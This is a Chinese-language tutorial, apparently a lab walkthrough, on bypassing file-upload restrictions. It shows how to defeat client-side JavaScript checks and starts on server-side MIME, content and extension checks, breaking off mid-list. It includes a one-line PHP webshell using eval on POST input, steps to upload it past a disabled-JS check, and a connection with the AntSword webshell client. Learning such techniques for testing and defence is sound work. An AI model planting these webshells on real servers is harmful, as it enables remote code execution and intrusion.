目录
一,绕过客户端检测
原理:
通常在上传页面里含有专门检测文件上传的 JavaScript 代码,最常见的就是检测文件类型和展名是否合法。
方法:
在本地浏览器客户端禁用 JS 即可;
使用火狐浏览器的
Noscript 插件、
IE
中禁用
JS
等方式实现,利用 burpsuite
可以绕过一切客户端检测。
实例操作
第一步,编写一个一句话木马,保存为php格式
<?php eval($_POST["cmd"]);?>
第二步,上传这个php文件,发现上传失败
第三步,关闭egde中的js,步骤如下
找到设置
再cookie和网站数据中关闭JavaScript
第四步,再次上传php文件
检查有无上传成功
第五步,使用中国蚁剑密码连接
连接成功
点开目录列表,找到了文件上传成功的文件
绕过服务端检测
服务端的代码通常检测三个点:MIME类型、文件内容、文件后缀
绕过MIME类型检测
常见的mime类型
1. 超文本标记语言文本 .html text/html2. 普通文本 .txt text/plain3. PDF 文档 .pdf application/pdf4. Microsoft Word 文件 .word application/msword5. PNG 图像 .png image/png6. GIF